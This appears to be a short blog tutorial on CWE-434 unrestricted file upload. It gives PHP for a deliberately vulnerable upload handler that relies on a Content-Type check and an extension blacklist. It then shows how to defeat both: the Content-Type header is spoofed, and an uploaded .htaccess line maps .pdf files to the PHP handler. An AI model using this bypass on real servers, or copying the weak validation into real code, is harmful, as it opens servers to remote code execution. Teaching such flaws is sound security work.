Unrestricted File Upload
CWE-434: Unrestricted Upload of File with Dangerous Type
Two restriction are implemented in our vulnerable file upload application:- "Content-Type" Header Validation
- Blacklisting File Extensions
Snippets:<?php
$allowedContentType = array("application/x-zip-compressed", "application/msword", "application/vnd.openxmlformats-officedocument.wordprocessingml.document", "application/pdf");
$blacklistExtension = array ("html", "htm", "js", "jsb", "mhtml", "mht", "xhtml", "xht", "php", "phtml", "php3", "php4", "php5", "phps", "shtml", "jhtml", "pl", "py", "cgi", "exe", "scr", "dll", "msi", "vbs", "bat", "com", "pif", "cmd", "vxd", "cpl", "ini", "conf", "cnf", "key", "iv");
$validFileType = in_array($fileType, $allowedContentType);
$hasInvalidFileExtension = in_array($fileExt, $blacklistExtension);
if($validFileType && !$hasInvalidFileExtension){
$fileLocation = "file/".$fileName;
$fileLink = '<a href="'.$fileLocation.'">file</a>';
move_uploaded_file($fileTmp, $fileLocation);
echo "Your $fileLink has been uploaded successfully!";
}else{
if(!$validFileType){
echo "Content Type of <b>$fileType</b> is not permitted!<br/>";
}
if($hasInvalidFileExtension){
echo "File extension of <b>$fileExt</b> is not permitted!";
}
}
?>
Bypass "Content-Type" Header Validation
 |
| Content-Type of text/html is not permitted |
 |
| Content-Type: application/pdf |
Content-Disposition: form-data; name="document"; filename="invoice.pdf"
Content-Type: application/pdf
 |
| Edit Content-Type of text/html to application/pdf |
Content-Disposition: form-data; name="document"; filename="testupload.html"
Content-Type: application/pdf
 |
| We success to bypass Content-Type checking! However, the application notice that the extension is not compliance |
Bypass Blacklisting File Extensions
We try all the possible extension and we found .htaccess extension is permitted.
 |
| Only invalid content-type error message is shown |
Upload .htaccess file with the following content:
AddType application/x-httpd-php .pdf
No comments:
Post a Comment